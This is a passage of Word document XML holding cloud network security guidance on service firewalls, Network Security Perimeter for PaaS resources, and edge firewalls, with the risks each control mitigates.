          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>For services supporting VNet integration (e.g., Azure App Service, Azure Functions, Azure Container Instances), configure deployment into new or existing virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C17281F" w14:textId="77777777" w:rsidR="00370940" w:rsidRPr="00370940" w:rsidRDefault="00370940" w:rsidP="00370940">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="189B6671" w14:textId="1A92D9E8" w:rsidR="008C74EB" w:rsidRDefault="008C74EB" w:rsidP="008C74EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C74EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure network security controls</w:t>
      </w:r>
      <w:r w:rsidR="00370940">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BB3BCF" w14:textId="26BBDB69" w:rsidR="00370940" w:rsidRDefault="00370940" w:rsidP="00370940">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00370940">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apply network security group (NSG) rules to the service's subnet to restrict inbound and outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D463A5" w14:textId="7753B98F" w:rsidR="00557D6A" w:rsidRDefault="00557D6A" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00557D6A">
        <w:t>NS-2.3: Configure service native firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717C1D42" w14:textId="2C8D3FC8" w:rsidR="006829B1" w:rsidRDefault="006829B1" w:rsidP="006829B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006829B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure service firewalls to restrict access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13613311" w14:textId="6536BB76" w:rsidR="006829B1" w:rsidRDefault="006829B1" w:rsidP="006829B1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006829B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable service firewall features</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EC8497" w14:textId="3C593A71" w:rsidR="006829B1" w:rsidRDefault="00623A9C" w:rsidP="00623A9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00623A9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For services supporting native firewalls (e.g., Azure Storage, Azure SQL Database, Azure Key Vault), enable firewall functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B049282" w14:textId="2FAD78E5" w:rsidR="00623A9C" w:rsidRDefault="00623A9C" w:rsidP="00623A9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00623A9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Define IP-based or VNet-based rules</w:t>
      </w:r>
      <w:r w:rsidR="00BA2E69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180DC8F" w14:textId="47F08A14" w:rsidR="00BA2E69" w:rsidRDefault="00BA2E69" w:rsidP="00BA2E69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA2E69">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure firewall rules to allow access only from specific public IP ranges (e.g., corporate office networks) or specific Azure virtual network subnets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541FD173" w14:textId="4748B63F" w:rsidR="007B5FC1" w:rsidRDefault="007B5FC1" w:rsidP="007B5FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B5FC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable public access when possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B65304B" w14:textId="3AF8A8EB" w:rsidR="007B5FC1" w:rsidRDefault="007B5FC1" w:rsidP="007B5FC1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B5FC1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When services require access only from private networks, use the toggle option to completely disable public network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A8BFE1" w14:textId="1582992E" w:rsidR="00A358BE" w:rsidRDefault="00A358BE" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A358BE">
        <w:t>NS-2.4: Use Network Security Perimeter for PaaS resource isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A62275" w14:textId="7CDA46C3" w:rsidR="00FD455C" w:rsidRDefault="00FD455C" w:rsidP="00FD455C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD455C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement Network Security Perimeter to secure PaaS resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785903D4" w14:textId="669C14C8" w:rsidR="00FD455C" w:rsidRDefault="00FD455C" w:rsidP="006F5894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD455C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create and associate resources</w:t>
      </w:r>
      <w:r w:rsidR="006F5894">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1561B2" w14:textId="19C7EFDF" w:rsidR="006F5894" w:rsidRDefault="006F5894" w:rsidP="006F5894">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F5894">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Establish a network security perimeter and add supported PaaS resources (Azure Storage, SQL Database, Key Vault, Event Hubs, Cosmos DB) through resource associations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC4A47" w14:textId="10253FDB" w:rsidR="0073568C" w:rsidRDefault="0073568C" w:rsidP="003031FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073568C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure access modes and rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06426CBD" w14:textId="66B41FE8" w:rsidR="0073568C" w:rsidRDefault="0073568C" w:rsidP="0073568C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073568C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Start with Transition mode to understand access patterns before transitioning to Enforced mode for maximum protectio</w:t>
      </w:r>
      <w:r w:rsidR="003031FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5048C415" w14:textId="603F0630" w:rsidR="003031FD" w:rsidRDefault="003031FD" w:rsidP="003031FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003031FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable monitoring and Private Link integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F84B443" w14:textId="154B012C" w:rsidR="007C4C67" w:rsidRDefault="007C4C67" w:rsidP="007C4C67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C4C67">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure diagnostic logs to capture access attempts and policy violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057C4C98" w14:textId="36C26CEF" w:rsidR="008448D3" w:rsidRDefault="0030648E" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc236841623"/>
      <w:r w:rsidRPr="0030648E">
        <w:t>NS-3: Deploy firewall at the edge of enterprise network</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="06413D56" w14:textId="03EDAEAF" w:rsidR="0030648E" w:rsidRPr="007F57DB" w:rsidRDefault="0030648E" w:rsidP="0030648E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F57DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principl</w:t>
      </w:r>
      <w:r w:rsidR="000317FD" w:rsidRPr="007F57DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E520240" w14:textId="4FA2DD39" w:rsidR="007F57DB" w:rsidRDefault="007F57DB" w:rsidP="007F57DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F57DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use firewall at the network edge to perform advanced filtering on network traffic to and from external networks, such as the internet, and between internal network segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D5552B" w14:textId="4E6E87BC" w:rsidR="007F57DB" w:rsidRDefault="007F57DB" w:rsidP="007F57DB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F57DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidR="00931F18" w:rsidRPr="007F57DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02120AC1" w14:textId="4955797B" w:rsidR="007F57DB" w:rsidRDefault="00067643" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067643">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized access via exposed protocols</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100C4A71" w14:textId="1347AE4F" w:rsidR="00067643" w:rsidRDefault="00067643" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067643">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Publicly accessible protocols like RDP (TCP 3389) or SMB (TCP 445) enable attackers to gain unauthorized entry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637F3E0F" w14:textId="024B29A3" w:rsidR="00067643" w:rsidRDefault="00067643" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00067643">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Malware and phishing via malicious domains/I</w:t>
      </w:r>
      <w:r w:rsidR="00B07444" w:rsidRPr="00067643">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00067643">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10634DB5" w14:textId="35A3341C" w:rsidR="00B07444" w:rsidRDefault="00B07444" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07444">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Malicious domains and IPs facilitate malware delivery or phishing campaigns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF8872B" w14:textId="31AB721D" w:rsidR="00B07444" w:rsidRDefault="00B07444" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07444">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data exfiltration through unrestricted outbound traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC09E39" w14:textId="083BD053" w:rsidR="00B07444" w:rsidRDefault="00B07444" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B07444">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Uncontrolled egress to unapproved destinations allows adversaries to exfiltrate sensitive data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1B0B0" w14:textId="2745CC33" w:rsidR="00971DA7" w:rsidRDefault="00971DA7" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971DA7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral movement due to poor segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BED278" w14:textId="32D4CF9C" w:rsidR="00971DA7" w:rsidRDefault="00971DA7" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971DA7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Insufficient network segmentation permits attackers to pivot internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51190E71" w14:textId="5799C001" w:rsidR="00971DA7" w:rsidRDefault="00971DA7" w:rsidP="00D712C8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00971DA7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vulnerabilities from untrusted applications/URLs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5FB6D" w14:textId="25F62A5E" w:rsidR="00D712C8" w:rsidRDefault="00D712C8" w:rsidP="00931F18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4680"/>
        </w:tabs>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00931F18">
        <w:rPr>
